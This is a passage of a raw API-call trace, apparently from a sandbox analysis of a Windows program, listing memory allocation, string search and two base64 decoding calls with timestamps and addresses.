cchString=0xbc, dwFlags=0x6, pbBinary=0x3594f20, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3594f20, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.281] malloc (_Size=0x8c) returned 0x60eec8 [0155.281] free (_Block=0x0) [0155.281] free (_Block=0x0) [0155.281] free (_Block=0x3594f20) [0155.281] free (_Block=0x3648f20) [0155.281] free (_Block=0x3f4bfe8) [0155.281] free (_Block=0x3f4bf58) [0155.281] free (_Block=0x3648e78) [0155.281] free (_Block=0x3e22428) [0155.281] memchr (_Buf=0x3f65460, _Val=32, _MaxCount=0x13) returned 0x0 [0155.281] malloc (_Size=0x14) returned 0x3f654c0 [0155.281] free (_Block=0x0) [0155.281] malloc (_Size=0x40) returned 0x3e226f8 [0155.281] free (_Block=0x0) [0155.281] free (_Block=0x0) [0155.281] free (_Block=0x3f654c0) [0155.281] free (_Block=0x3e226f8) [0155.282] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x19) returned 0x3d800b2 [0155.282] malloc (_Size=0xb) returned 0x3648d28 [0155.282] free (_Block=0x0) [0155.282] malloc (_Size=0x40) returned 0x3e222c0 [0155.282] free (_Block=0x0) [0155.282] free (_Block=0x0) [0155.282] memchr (_Buf=0x3d800b3, _Val=32, _MaxCount=0xe) returned 0x0 [0155.282] malloc (_Size=0xf) returned 0x3648cb0 [0155.282] free (_Block=0x0) [0155.282] free (_Block=0x0) [0155.282] free (_Block=0x3648d28) [0155.282] free (_Block=0x3648cb0) [0155.282] free (_Block=0x3e222c0) [0155.282] memchr (_Buf=0x60ec88, _Val=32, _MaxCount=0x40) returned 0x0 [0155.282] malloc (_Size=0x41) returned 0x60ee68 [0155.282] free (_Block=0x0) [0155.282] malloc (_Size=0x40) returned 0x3e22548 [0155.282] free (_Block=0x0) [0155.282] free (_Block=0x0) [0155.282] free (_Block=0x60ee68) [0155.282] free (_Block=0x3e22548) [0155.282] memchr (_Buf=0x60e9b8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.282] malloc (_Size=0x41) returned 0x60ecd8 [0155.283] free (_Block=0x0) [0155.283] malloc (_Size=0x40) returned 0x3e22038 [0155.283] free (_Block=0x0) [0155.283] free (_Block=0x0) [0155.283] free (_Block=0x60ecd8) [0155.283] free (_Block=0x3e22038) [0155.283] memchr (_Buf=0x3624b80, _Val=32, _MaxCount=0x2c) returned 0x0 [0155.283] malloc (_Size=0x2d) returned 0x36249c0 [0155.283] free (_Block=0x0) [0155.283] malloc (_Size=0x40) returned 0x3e22668 [0155.283] free (_Block=0x0) [0155.283] free (_Block=0x0) [0155.283] free (_Block=0x36249c0) [0155.283] free (_Block=0x3e22668) [0155.283] memchr (_Buf=0x3f65480, _Val=32, _MaxCount=0x17) returned 0x3f65488 [0155.283] malloc (_Size=0x9) returned 0x3648cc8 [0155.283] free (_Block=0x0) [0155.283] malloc (_Size=0x40) returned 0x3e225d8 [0155.283] free (_Block=0x0) [0155.283] free (_Block=0x0) [0155.283] memchr (_Buf=0x3f65489, _Val=32, _MaxCount=0xe) returned 0x0 [0155.283] malloc (_Size=0xf) returned 0x3648e60 [0155.283] free (_Block=0x0) [0155.283] free (_Block=0x0) [0155.284] free (_Block=0x3648cc8) [0155.284] free (_Block=0x3648e60) [0155.284] free (_Block=0x3e225d8) [0155.284] memchr (_Buf=0x3d802d8, _Val=32, _MaxCount=0x1a) returned 0x3d802f0 [0155.284] malloc (_Size=0x19) returned 0x3d80300 [0155.284] free (_Block=0x0) [0155.284] malloc (_Size=0x40) returned 0x3e226f8 [0155.284] free (_Block=0x0) [0155.284] free (_Block=0x0) [0155.284] memchr (_Buf=0x3d802f1, _Val=32, _MaxCount=0x1) returned 0x0 [0155.284] malloc (_Size=0x2) returned 0x3f4c0e8 [0155.284] free (_Block=0x0) [0155.284] free (_Block=0x0) [0155.284] free (_Block=0x3d80300) [0155.284] free (_Block=0x3f4c0e8) [0155.284] free (_Block=0x3e226f8) [0155.284] memchr (_Buf=0x3d80148, _Val=32, _MaxCount=0x1c) returned 0x3d80152 [0155.284] malloc (_Size=0xb) returned 0x3648e90 [0155.284] free (_Block=0x0) [0155.284] malloc (_Size=0x40) returned 0x3e221a0 [0155.284] free (_Block=0x0) [0155.284] free (_Block=0x0) [0155.284] memchr (_Buf=0x3d80153, _Val=32, _MaxCount=0x11) returned 0x3d8015a [0155.284] malloc (_Size=0x8) returned 0x3f4bf98 [0155.284] free (_Block=0x0) [0155.285] free (_Block=0x0) [0155.285] memchr (_Buf=0x3d8015b, _Val=32, _MaxCount=0x9) returned 0x0 [0155.285] malloc (_Size=0xa) returned 0x3648e00 [0155.285] free (_Block=0x0) [0155.285] free (_Block=0x0) [0155.285] free (_Block=0x3648e90) [0155.285] free (_Block=0x3f4bf98) [0155.285] free (_Block=0x3648e00) [0155.285] free (_Block=0x3e221a0) [0155.285] memchr (_Buf=0x60eaa8, _Val=32, _MaxCount=0x40) returned 0x0 [0155.285] malloc (_Size=0x41) returned 0x60ed28 [0155.285] free (_Block=0x0) [0155.285] malloc (_Size=0x40) returned 0x3e22158 [0155.285] free (_Block=0x0) [0155.285] free (_Block=0x0) [0155.285] free (_Block=0x60ed28) [0155.285] free (_Block=0x3e22158) [0155.285] memchr (_Buf=0x60e878, _Val=32, _MaxCount=0x40) returned 0x0 [0155.285] malloc (_Size=0x41) returned 0x60ea58 [0155.285] free (_Block=0x0) [0155.285] malloc (_Size=0x40) returned 0x3e222c0 [0155.285] free (_Block=0x0) [0155.285] free (_Block=0x0) [0155.285] free (_Block=0x60ea58) [0155.285] free (_Block=0x3e222c0) [0155.285] memchr (_Buf=0x3648f08, _Val=32, _MaxCount=0xc) returned 0x0 [0155.285] malloc (_Size=0xd) returned 0x3648e78 [0155.286] free (_Block=0x0) [0155.286] malloc (_Size=0x40) returned 0x3e22668 [0155.286] free (_Block=0x0) [0155.286] free (_Block=0x0) [0155.286] free (_Block=0x3648e78) [0155.286] free (_Block=0x3e22668) [0155.286] memchr (_Buf=0x3d80288, _Val=32, _MaxCount=0x1a) returned 0x3d80290 [0155.286] malloc (_Size=0x9) returned 0x3648d70 [0155.286] free (_Block=0x0) [0155.286] malloc (_Size=0x40) returned 0x3e22668 [0155.286] free (_Block=0x0) [0155.286] free (_Block=0x0) [0155.286] memchr (_Buf=0x3d80291, _Val=32, _MaxCount=0x11) returned 0x3d80298 [0155.286] malloc (_Size=0x8) returned 0x3f4c038 [0155.286] free (_Block=0x0) [0155.286] free (_Block=0x0) [0155.286] memchr (_Buf=0x3d80299, _Val=32, _MaxCount=0x9) returned 0x0 [0155.286] malloc (_Size=0xa) returned 0x3648e90 [0155.286] free (_Block=0x0) [0155.286] free (_Block=0x0) [0155.286] free (_Block=0x3648d70) [0155.286] free (_Block=0x3f4c038) [0155.286] free (_Block=0x3648e90) [0155.287] free (_Block=0x3e22668) [0155.287] memchr (_Buf=0x3def010, _Val=32, _MaxCount=0x618) returned 0x3def016 [0155.287] malloc (_Size=0x7) returned 0x3f4bf48 [0155.287] free (_Block=0x0) [0155.287] malloc (_Size=0x40) returned 0x3e22548 [0155.287] free (_Block=0x0) [0155.287] free (_Block=0x0) [0155.287] memchr (_Buf=0x3def017, _Val=32, _MaxCount=0x611) returned 0x3def040 [0155.287] malloc (_Size=0x2a) returned 0x3624870 [0155.287] free (_Block=0x0) [0155.287] free (_Block=0x0) [0155.287] memchr (_Buf=0x3def041, _Val=32, _MaxCount=0x5e7) returned 0x3def06a [0155.287] malloc (_Size=0x2a) returned 0x3624a30 [0155.287] free (_Block=0x0) [0155.287] free (_Block=0x0) [0155.287] memchr (_Buf=0x3def06b, _Val=32, _MaxCount=0x5bd) returned 0x3def094 [0155.287] malloc (_Size=0x2a) returned 0x3624a68 [0155.287] free (_Block=0x0) [0155.287] free (_Block=0x0) [0155.287] memchr (_Buf=0x3def095, _Val=32, _MaxCount=0x593) returned 0x3def0be [0155.287] malloc (_Size=0x2a) returned 0x3624988 [0155.287] free (_Block=0x0) [0155.287] malloc (_Size=0x140) returned 0x3dd48d8 [0155.287] free (_Block=0x3e22548) [0155.288] free (_Block=0x0) [0155.288] memchr (_Buf=0x3def0bf, _Val=32, _MaxCount=0x569) returned 0x3def0e8 [0155.288] malloc (_Size=0x2a) returned 0x36249f8 [0155.288] free (_Block=0x0) [0155.288] free (_Block=0x0) [0155.288] memchr (_Buf=0x3def0e9, _Val=32, _MaxCount=0x53f) returned 0x3def112 [0155.288] malloc (_Size=0x2a) returned 0x3624aa0 [0155.288] free (_Block=0x0) [0155.288] free (_Block=0x0) [0155.288] memchr (_Buf=0x3def113, _Val=32, _MaxCount=0x515) returned 0x3def13c [0155.288] malloc (_Size=0x2a) returned 0x3624b48 [0155.288] free (_Block=0x0) [0155.288] free (_Block=0x0) [0155.288] memchr (_Buf=0x3def13d, _Val=32, _MaxCount=0x4eb) returned 0x3def166 [0155.288] malloc (_Size=0x2a) returned 0x36248a8 [0155.288] free (_Block=0x0) [0155.288] free (_Block=0x0) [0155.288] memchr (_Buf=0x3def167, _Val=32, _MaxCount=0x4c1) returned 0x3def190 [0155.288] malloc (_Size=0x2a) returned 0x36249c0 [0155.288] free (_Block=0x0) [0155.288] free (_Block=0x0) [0155.288] memchr (_Buf=0x3def191, _Val=32, _MaxCount=0x497) returned 0x3def1ba [0155.288] malloc (_Size=0x2a) returned 0x36248e0 [0155.289] free (_Block=0x0) [0155.289] free (_Block=0x0) [0155.289] memchr (_Buf=0x3def1bb, _Val=32, _MaxCount=0x46d) returned 0x3def1e4 [0155.289] malloc (_Size=0x2a) returned 0x3624918 [0155.289] free (_Block=0x0) [0155.289] free (_Block=0x0) [0155.289] memchr (_Buf=0x3def1e5, _Val=32, _MaxCount=0x443) returned 0x3def20e [0155.289] malloc (_Size=0x2a) returned 0x3624950 [0155.289] free (_Block=0x0) [0155.289] free (_Block=0x0) [0155.289] memchr (_Buf=0x3def20f, _Val=32, _MaxCount=0x419) returned 0x3def238 [0155.289] malloc (_Size=0x2a) returned 0x3624bb8 [0155.289] free (_Block=0x0) [0155.289] free (_Block=0x0) [0155.289] memchr (_Buf=0x3def239, _Val=32, _MaxCount=0x3ef) returned 0x3def262 [0155.289] malloc (_Size=0x2a) returned 0x3624838 [0155.289] free (_Block=0x0) [0155.289] free (_Block=0x0) [0155.289] memchr (_Buf=0x3def263, _Val=32, _MaxCount=0x3c5) returned 0x3def28c [0155.289] malloc (_Size=0x2a) returned 0x3624ad8 [0155.289] free (_Block=0x0) [0155.290] free (_Block=0x0) [0155.290] memchr (_Buf=0x3def28d, _Val=32, _MaxCount=0x39b) returned 0x3def2b6 [0155.290] malloc (_Size=0x2a) returned 0x3df0040 [0155.290] free (_Block=0x0) [0155.290] free (_Block=0x0) [0155.290] memchr (_Buf=0x3def2b7, _Val=32, _MaxCount=0x371) returned 0x3def2e0 [0155.290] malloc (_Size=0x2a) returned 0x3df0078 [0155.290] free (_Block=0x0) [0155.290] free (_Block=0x0) [0155.290] memchr (_Buf=0x3def2e1, _Val=32, _MaxCount=0x347) returned 0x3def30a [0155.290] malloc (_Size=0x2a) returned 0x3df0008 [0155.290] free (_Block=0x0) [0155.290] free (_Block=0x0) [0155.290] memchr (_Buf=0x3def30b, _Val=32, _MaxCount=0x31d) returned 0x3def334 [0155.290] malloc (_Size=0x2a) returned 0x3defcf8 [0155.290] free (_Block=0x0) [0155.290] free (_Block=0x0) [0155.290] memchr (_Buf=0x3def335, _Val=32, _MaxCount=0x2f3) returned 0x3def35e [0155.290] malloc (_Size=0x2a) returned 0x3defa90 [0155.290] free (_Block=0x0) [0155.290] malloc (_Size=0x540) returned 0x3f68010 [0155.290] free (_Block=0x3dd48d8) [0155.291] free (_Block=0x0) [0155.291] memchr (_Buf=0x3def35f, _Val=32, _MaxCount=0x2c9) returned 0x3def388 [0155.291] malloc (_Size=0x2a) returned 0x3defac8 [0155.291] free (_Block=0x0) [0155.291] free (_Block=0x0) [0155.291] memchr (_Buf=0x3def389, _Val=32, _MaxCount=0x29f) returned 0x3def3b2 [0155.291] malloc (_Size=0x2a) returned 0x3defba8 [0155.291] free (_Block=0x0) [0155.291] free (_Block=0x0) [0155.291] memchr (_Buf=0x3def3b3, _Val=32, _MaxCount=0x275) returned 0x3def3dc [0155.291] malloc (_Size=0x2a) returned 0x3defc50 [0155.291] free (_Block=0x0) [0155.291] free (_Block=0x0) [0155.291] memchr (_Buf=0x3def3dd, _Val=32, _MaxCount=0x24b) returned 0x3def406 [0155.291] malloc (_Size=0x2a) returned 0x3defbe0 [0155.291] free (_Block=0x0) [0155.291] free (_Block=0x0) [0155.291] memchr (_Buf=0x3def407, _Val=32, _MaxCount=0x221) returned 0x3def430 [0155.291] malloc (_Size=0x2a) returned 0x3defb00 [0155.291] free (_Block=0x0) [0155.291] free (_Block=0x0) [0155.291] memchr (_Buf=0x3def431, _Val=32, _MaxCount=0x1f7) returned 0x3def45a [0155.291] malloc (_Size=0x2a) returned 0x3defc88 [0155.292] free (_Block=0x0) [0155.292] free (_Block=0x0) [0155.292] memchr (_Buf=0x3def45b, _Val=32, _MaxCount=0x1cd) returned 0x3def484 [0155.292] malloc (_Size=0x2a) returned 0x3defb38 [0155.292] free (_Block=0x0) [0155.292] free (_Block=0x0) [0155.292] memchr (_Buf=0x3def485, _Val=32, _MaxCount=0x1a3) returned 0x3def4ae [0155.292] malloc (_Size=0x2a) returned 0x3defb70 [0155.292] free (_Block=0x0) [0155.292] free (_Block=0x0) [0155.292] memchr (_Buf=0x3def4af, _Val=32, _MaxCount=0x179) returned 0x3def4d8 [0155.292] malloc (_Size=0x2a) returned 0x3defe80 [0155.292] free (_Block=0x0) [0155.292] free (_Block=0x0) [0155.292] memchr (_Buf=0x3def4d9, _Val=32, _MaxCount=0x14f) returned 0x3def502 [0155.292] malloc (_Size=0x2a) returned 0x3defc18 [0155.292] free (_Block=0x0) [0155.292] free (_Block=0x0) [0155.292] memchr (_Buf=0x3def503, _Val=32, _MaxCount=0x125) returned 0x3def52c [0155.292] malloc (_Size=0x2a) returned 0x3defd30 [0155.292] free (_Block=0x0) [0155.293] free (_Block=0x0) [0155.293] memchr (_Buf=0x3def52d, _Val=32, _MaxCount=0xfb) returned 0x3def556 [0155.293] malloc (_Size=0x2a) returned 0x3def940 [0155.293] free (_Block=0x0) [0155.293] free (_Block=0x0) [0155.293] memchr (_Buf=0x3def557, _Val=32, _MaxCount=0xd1) returned 0x3def580 [0155.293] malloc (_Size=0x2a) returned 0x3defcc0 [0155.293] free (_Block=0x0) [0155.293] free (_Block=0x0) [0155.293] memchr (_Buf=0x3def581, _Val=32, _MaxCount=0xa7) returned 0x3def5aa [0155.293] malloc (_Size=0x2a) returned 0x3deff98 [0155.293] free (_Block=0x0) [0155.293] free (_Block=0x0) [0155.293] memchr (_Buf=0x3def5ab, _Val=32, _MaxCount=0x7d) returned 0x3def5d4 [0155.293] malloc (_Size=0x2a) returned 0x3defd68 [0155.293] free (_Block=0x0) [0155.293] free (_Block=0x0) [0155.293] memchr (_Buf=0x3def5d5, _Val=32, _MaxCount=0x53) returned 0x3def5fe [0155.293] malloc (_Size=0x2a) returned 0x3defa58 [0155.293] free (_Block=0x0) [0155.293] free (_Block=0x0) [0155.293] memchr (_Buf=0x3def5ff, _Val=32, _MaxCount=0x29) returned 0x0 [0155.294] malloc (_Size=0x2a) returned 0x3defda0 [0155.294] free (_Block=0x0) [0155.294] free (_Block=0x0) [0155.294] free (_Block=0x3f4bf48) [0155.294] free (_Block=0x3624870) [0155.294] free (_Block=0x3624a30) [0155.294] free (_Block=0x3624a68) [0155.294] free (_Block=0x3624988) [0155.294] free (_Block=0x36249f8) [0155.294] free (_Block=0x3624aa0) [0155.294] free (_Block=0x3624b48) [0155.294] free (_Block=0x36248a8) [0155.294] free (_Block=0x36249c0) [0155.294] free (_Block=0x36248e0) [0155.294] free (_Block=0x3624918) [0155.294] free (_Block=0x3624950) [0155.294] free (_Block=0x3624bb8) [0155.294] free (_Block=0x3624838) [0155.294] free (_Block=0x3624ad8) [0155.294] free (_Block=0x3df0040) [0155.294] free (_Block=0x3df0078) [0155.294] free (_Block=0x3df0008) [0155.294] free (_Block=0x3defcf8) [0155.294] free (_Block=0x3defa90) [0155.294] free (_Block=0x3defac8) [0155.294] free (_Block=0x3defba8) [0155.295] free (_Block=0x3defc50) [0155.295] free (_Block=0x3defbe0) [0155.295] free (_Block=0x3defb00) [0155.295] free (_Block=0x3defc88) [0155.295] free (_Block=0x3defb38) [0155.295] free (_Block=0x3defb70) [0155.295] free (_Block=0x3defe80) [0155.295] free (_Block=0x3defc18) [0155.295] free (_Block=0x3defd30) [0155.295] free (_Block=0x3def940) [0155.295] free (_Block=0x3defcc0) [0155.295] free (_Block=0x3deff98) [0155.295] free (_Block=0x3defd68) [0155.295] free (_Block=0x3defa58) [0155.295] free (_Block=0x3defda0) [0155.295] free (_Block=0x3f68010) [0155.295] memchr (_Buf=0x3f65280, _Val=32, _MaxCount=0x12) returned 0x0 [0155.295] malloc (_Size=0x13) returned 0x3f654c0 [0155.295] free (_Block=0x0) [0155.295] malloc (_Size=0x40) returned 0x3e221e8 [0155.295] free (_Block=0x0) [0155.295] free (_Block=0x0) [0155.295] free (_Block=0x3f654c0) [0155.295] free (_Block=0x3e221e8) [0155.295] memchr (_Buf=0x3d803f0, _Val=32, _MaxCount=0x1d) returned 0x3d803f7 [0155.295] malloc (_Size=0x8) returned 0x3f4c078 [0155.295] free (_Block=0x0) [0155.296] malloc (_Size=0x40) returned 0x3e226f8 [0155.296] free (_Block=0x0) [0155.296] free (_Block=0x0) [0155.296] memchr (_Buf=0x3d803f8, _Val=32, _MaxCount=0x15) returned 0x0 [0155.296] malloc (_Size=0x16) returned 0x3f654c0 [0155.296] free (_Block=0x0) [0155.296] free (_Block=0x0) [0155.296] free (_Block=0x3f4c078) [0155.296] free (_Block=0x3f654c0) [0155.296] free (_Block=0x3e226f8) [0155.296] memchr (_Buf=0x3e220c8, _Val=32, _MaxCount=0x3b) returned 0x3e220d6 [0155.296] malloc (_Size=0xf) returned 0x3648f20 [0155.296] free (_Block=0x0) [0155.296] malloc (_Size=0x40) returned 0x3e22620 [0155.296] free (_Block=0x0) [0155.296] free (_Block=0x0) [0155.296] memchr (_Buf=0x3e220d7, _Val=32, _MaxCount=0x2c) returned 0x0 [0155.296] malloc (_Size=0x2d) returned 0x3624b48 [0155.296] free (_Block=0x0) [0155.296] free (_Block=0x0) [0155.296] CryptStringToBinaryA (in: pszString="ETQORrd/zxGgngFnbtAh5LwjaEaxJ4HylBSXHhW+qjw=", cchString=0x2c, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.296] malloc (_Size=0x20) returned 0x3d80300 [0155.296] free (_Block=0x0) [0155.296] CryptStringToBinaryA (in: pszString="ETQORrd/zxGgngFnbtAh5LwjaEaxJ4HylBSXHhW+qjw=", cchString=0x2c, dwFlags=0x6, pbBinary=0x3d80300, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d80300, pcbBinary=0x316f478, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0155.296] malloc (_Size=0x20) returned 0x3d80210 [0155.297] free (_Block=0x0) [0155.297] free (_Block=0x0) [0155.297] free (_Block=0x3d80300) [0155.297] free (_Block=0x3648f20) [0155.297] free (_Block=0x3624b48) [0155.297] free (_Block=0x3e22620) [0155.297] memchr (_Buf=0x3f652c0, _Val=32, _MaxCount=0x12) returned 0x3f652c6 [0155.297] malloc (_Size=0x7) returned 0x3f4c0f8 [0155.297] free (_Block=0x0) [0155.297] malloc (_Size=0x40) returned 0x3e224b8 [0155.297] free (_Block=0x0) [0155.297] free (_Block=0x0) [0155.297] memchr (_Buf=0x3f652c7, _Val=32, _MaxCount=0xb) returned 0x0 [0155.297] malloc (_Size=0xc) returned 0x3648e78 [0155.297] free (_Block=0x0) [0155.297] free (_Block=0x0) [0155.297] free (_Block=0x3f4c0f8) [0155.297] free (_Block=0x3648e78) [0155.297] free (_Block=0x3e224b8) [0155.297] memchr (_Buf=0x3f651e0, _Val=32, _MaxCount=0x17) returned 0x3f651e6 [0155.297] malloc (_Size=0x7) returned 0x3f4bff8 [0155.297] free (_Block=0x0) [0155.297] malloc (_Size=0x40) returned 0x3e22500 [0155.297] free (_Block=0x0) [0155.297] free (_Block=0x0) [0155.297] memchr (_Buf=0x3f651e7, _Val=32, _MaxCount=0x10) returned 0x0 [0155.298] malloc (_Size=0x11) returned 0x3f654c0 [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x3f4bff8) [0155.298] free (_Block=0x3f654c0) [0155.298] free (_Block=0x3e22500) [0155.298] memchr (_Buf=0x3f65320, _Val=32, _MaxCount=0x14) returned 0x3f65326 [0155.298] malloc (_Size=0x7) returned 0x3f4c088 [0155.298] free (_Block=0x0) [0155.298] malloc (_Size=0x40) returned 0x3e22110 [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x0) [0155.298] memchr (_Buf=0x3f65327, _Val=32, _MaxCount=0xd) returned 0x0 [0155.298] malloc (_Size=0xe) returned 0x3648d58 [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x3f4c088) [0155.298] free (_Block=0x3648d58) [0155.298] free (_Block=0x3e22110) [0155.298] memchr (_Buf=0x3f65300, _Val=32, _MaxCount=0x17) returned 0x3f65306 [0155.298] malloc (_Size=0x7) returned 0x3f4c058 [0155.298] free (_Block=0x0) [0155.298] malloc (_Size=0x40) returned 0x3e22548 [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x0) [0155.298] memchr (_Buf=0x3f65307, _Val=32, _MaxCount=0x10) returned 0x0 [0155.298] malloc (_Size=0x11) returned 0x3f654c0 [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x0) [0155.298] free (_Block=0x3f4c058) [0155.298] free (_Block=0x3f654c0) [0155.299] free (_Block=0x3e22548) [0155.299] memchr (_Buf=0x3f65340, _Val=32, _MaxCount=0x13) returned 0x3f65346 [0155.299] malloc (_Size=0x7) returned 0x3f4bfe8 [0155.299] free (_Block=0x0) [0155.299] malloc (_Size=0x40) returned 0x3e226f8 [0155.299] free (_Block=0x0) [0155.299] free (_Block=0x0) [0155.299] memchr (_Buf=0x3f65347, _Val=32, _MaxCount=0xc) returned 0x0 [0155.299] malloc (_Size=0xd) returned 0x3648cf8 [0155.299] free (_Block=0x0) [0155.299] free (_Block=0x0) [0155.299] free (_Block=0x3f4bfe8) [0155.299] free (_Block=0x3648cf8) [0155.299] free (_Block=0x3e226f8) [0155.299] memchr (_Buf=0x3f65360, _Val=32, _MaxCount=0x16) returned 0x3f65366 [0155.299] malloc (_Size=0x7) returned 0x3f4c048 [0155.299] free (_Block=0x0) [0155.299] malloc (_Size=0x40) returned 0x3e222c0 [0155.299] free (_Block=0x0) [0155.299] free (_Block=0x0) [0155.299] memchr (_Buf=0x3f65367, _Val=32, _MaxCount=0xf) returned 0x0 [0155.299] malloc (_Size=0x10) returned 0x3648d10 [0155.299] free (_Block=0x0) [0155.299] free (_Block=0x0) [0155.299] free (_Block=0x3f4c048) [0155.299] free (_Block=0x3648d10) [0155.299] free (_Block=0x3e222c0) [0155.300] memchr (_Buf=0x3f653c0, _Val=32, _MaxCount=0x17) returned 0x3f653c6 [0155.300] malloc (_Size=0x7) returned 0x3f4bf28 [0155.300] free (_Block=0x0) [0155.300] malloc (_Size=0x40) returned 0x3e22620 [0155.300] free (_Block=0x0) [0155.300] free (_Block=0x0) [0155.300] memchr (_Buf=0x3f653c7, _Val=32, _MaxCount=0x10) returned 0x0 [0155.300] malloc (_Size=0x11) returned 0x3f65520 [0155.300] free (_Block=0x0) [0155.300] free (_Block=0x0) [0155.300] free (_Block=0x3f4bf28) [0155.300] free (_Block=0x3f65520) [0155.300] free (_Block=0x3e22620) [0155.300] memchr (_Buf=0x3648d40, _Val=32, _MaxCount=0xa) returned 0x3648d46 [0155.300] malloc (_Size=0x7) returned 0x3f4c068 [0155.300] free (_Block=0x0) [0155.300] malloc (_Size=0x40) returned 0x3e22308 [0155.300] free (_Block=0x0) [0155.300] free (_Block=0x0) [0155.300] memchr (_Buf=0x3648d47, _Val=32, _MaxCount=0x3) returned 0x0 [0155.300] malloc (_Size=0x4) returned 0x3f4c0d8 [0155.300] free (_Block=0x0) [0155.300] free (_Block=0x0) [0155.300] free (_Block=0x3f4c068) [0155.300] free (_Block=0x3f4c0d8) [0155.300] free (_Block=0x3e22308) [0155.300] memchr (_Buf=0x3d801c0, _Val=32, _MaxCount=0x1a) returned 0x3d801cb [0155.300] malloc (_Size=0xc) returned 0x3648e90 [0155.300] free (_Block=0x0) [0155.300] malloc (_Size=0x40) returned 0x3e22350 [0155.301] free (_Block=0x0) [0155.301] free (_Block=0x0) [0155.301] memchr (_Buf=0x3d801cc, _Val=32, _MaxCount=0xe) returned 0x3d801d2 [0155.301] malloc (_Size=0x7) returned 0x3f4c0b8 [0155.301] free (_Block=0x0) [0155.301] free (_Block=0x0) [0155.301] memchr (_Buf=0x3d801d3, _Val=32, _MaxCount=0x7) returned 0x0 [0155.301] malloc (_Size=0x8) returned 0x3f4c008 [0155.301] free (_Block=0x0) [0155.301] free (_Block=0x0) [0155.301] free (_Block=0x3648e90) [0155.301] free (_Block=0x3f4c0b8) [0155.301] free (_Block=0x3f4c008) [0155.301] free (_Block=0x3e22350) [0155.301] memchr (_Buf=0x3f65380, _Val=32, _MaxCount=0x14) returned 0x0 [0155.301] malloc (_Size=0x15) returned 0x3f654c0 [0155.301] free (_Block=0x0) [0155.301] malloc (_Size=0x40) returned 0x3e226f8 [0155.301] free (_Block=0x0) [0155.301] free (_Block=0x0) [0155.301] free (_Block=0x3f654c0) [0155.301] free (_Block=0x3e226f8) [0155.301] memchr (_Buf=0x60bb78, _Val=32, _MaxCount=0x69) returned 0x60bb8a [0155.301] malloc (_Size=0x13) returned 0x3f654c0 [0155.301] free (_Block=0x0) [0155.301] malloc (_Size=0x40) returned 0x3e221a0 [0155.301] free (_Block=0x0) [0155.301] free (_Block=0x0) [0155.301] memchr (_Buf=0x60bb8b, _Val=32, _MaxCount=0x56) returned 0x0 [0155.301] malloc (_Size=0x57) returned 0x60ef60 [0155.302] free (_Block=0x0) [0155.302] free (_Block=0x0) [0155.302] free (_Block=0x3f654c0) [0155.302] free (_Block=0x60ef60) [0155.302] free (_Block=0x3e221a0) [0155.302] memchr (_Buf=0x3f653e0, _Val=32, _MaxCount=0x10) returned 0x0 [0155.302] malloc (_Size=0x11) returned 0x3f654c0 [0155.302] free (_Block=0x0) [0155.302] malloc (_Size=0x40) returned 0x3e22110 [0155.302] free (_Block=0x0) [0155.302] free (_Block=0x0) [0155.302] free (_Block=0x3f654c0) [0155.302] free (_Block=0x3e22110) [0155.302] memchr (_Buf=0x3d80260, _Val=32, _MaxCount=0x19) returned 0x3d8026a [0155.302] malloc (_Size=0xb) returned 0x3648d58 [0155.302] free (_Block=0x0) [0155.302] malloc (_Size=0x40) returned 0x3e22158 [0155.302] free (_Block=0x0) [0155.302] free (_Block=0x0) [0155.302] memchr (_Buf=0x3d8026b, _Val=32, _MaxCount=0xe) returned 0x0 [0155.302] malloc (_Size=0xf) returned 0x3648db8 [0155.302] free (_Block=0x0) [0155.302] free (_Block=0x0) [0155.302] free (_Block=0x3648d58) [0155.302] free (_Block=0x3648db8) [0155.302] free (_Block=0x3e22158) [0155.302] memchr (_Buf=0x60e788, _Val=32, _MaxCount=0x40) returned 0x0 [0155.302] malloc (_Size=0x41) returned 0x60e8c8 [0155.303] free (_Block=0x0) [0155.303] malloc (_Size=0x40) returned 0x3e22158 [0155.303] free (_Block=0x0) [0155.303] free (_Block=0x0) [0155.303] free (_Block=0x60e8c8) [0155.303] free (_Block=0x3e22158) [0155.303] memchr (_Buf=0x60e918, _Val=32, _MaxCount=0x40) returned 0x0 [0155.303] malloc (_Size=0x41) returned 0x60eaf8 [0155.303] free (_Block=0x0) [0155.303] malloc (_Size=0x40) returned 0x3e22548 [0155.303] free (_Block=0x0) [0155.303] free (_Block=0x0) [0155.303] free (_Block=0x60eaf8) [0155.303] free (_Block=0x3e22548) [0155.303] memchr (_Buf=0x3624b10, _Val=32, _MaxCount=0x2c) returned 0x0 [0155.303] malloc (_Size=0x2d) returned 0x3624950 [0155.303] free (_Block=0x0) [0155.303] malloc (_Size=0x40) returned 0x3e22548 [0155.303] free (_Block=0x0) [0155.303] free (_Block=0x0) [0155.303] free (_Block=0x3624950) [0155.303] free (_Block=0x3e22548) [0155.303] memchr (_Buf=0x3f654a0, _Val=32, _MaxCount=0x17) returned 0x3f654a8 [0155.303] malloc (_Size=0x9) returned 0x3648d70 [0155.303] free (_Block=0x0) [0155.303] malloc (_Size=0x40) returned 0x3e22620 [0155.303] free (_Block=0x0) [0155.304] free (_Block=0x0) [0155.304] memchr (_Buf=0x3f654a9, _Val=32, _MaxCount=0xe) returned 0x0 [0155.304] malloc (_Size=0xf) returned 0x3648c80 [0155.304] free (_Block=0x0) [0155.304] free (_Block=0x0) [0155.304] free (_Block=0x3648d70) [0155.304] free (_Block=0x3648c80) [0155.304] free (_Block=0x3e22620) [0155.304] free (_Block=0x36926e0) [0155.304] free (_Block=0x60dd68) [0155.304] free (_Block=0x3f65440) [0155.304] free (_Block=0x3d803c8) [0155.304] free (_Block=0x60edc8) [0155.304] free (_Block=0x60ee18) [0155.304] free (_Block=0x3e226b0) [0155.304] free 